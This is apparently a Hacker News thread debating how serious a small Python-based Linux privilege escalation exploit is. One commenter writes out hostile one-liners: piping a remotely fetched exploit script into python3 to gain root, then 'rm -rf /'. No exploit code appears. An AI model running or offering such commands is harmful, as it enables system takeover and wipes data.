upvote

points

by i_think_so1 hours ago |
comments
upvoteby tptacek1 hours ago|
next
[-]
You're freaking out about the exploit being written in Python and occupying only a small number of bytes. Are you the LLM that wrote Xint's terrible landing page? If so, I have questions.
reply
upvoteby i_think_so1 hours ago|
parent|
[-]
Oh come on, you know what I'm saying. It's small when written in python, which means any skid can spew it into a server he's got a shell on and get root in 2 seconds. He doesn't need to hope there's already a compiler installed, nor does he need to download some big tool. Just:

  cat | python3 && su
  <puke>, Ctrl-D
And I'm sure it can be refined into something much more likable to the spooky types, if they haven't already done it.
reply
upvoteby akerl_37 minutes ago|
parent|
[-]
Again, Linux LPE via either vulns or misconfigured permissions / binaries is common.

People who run servers that give out shell access to uses or randos already needed to contend with this.

Added later: you may find https://gtfobins.org/ fascinating or horrifying.

reply
upvoteby akerl_1 hours ago|
prev|
[-]
I think you’re reading a ton into this vulnerability that is not there.
reply
upvoteby i_think_so1 hours ago|
parent|
[-]
I wish you were right. But I've been testing every system I can and so far I'm yet to find one that isn't vulnerable.

  $ curl http://my.server.ip.addr/copy_fail_exp.py | python3 && su
  # rm -rf / &
25 seconds if I type it out by hand instead of copypasta. Sigh.
reply
upvoteby akerl_1 hours ago|
parent|
[-]
How many people do you let have local code execution on your systems? This is a local privilege escalation. They are relatively common. They are a big deal if you run a system that lets multiple untrusted users commingle code on a shared operating system.

Otherwise it’s not.

reply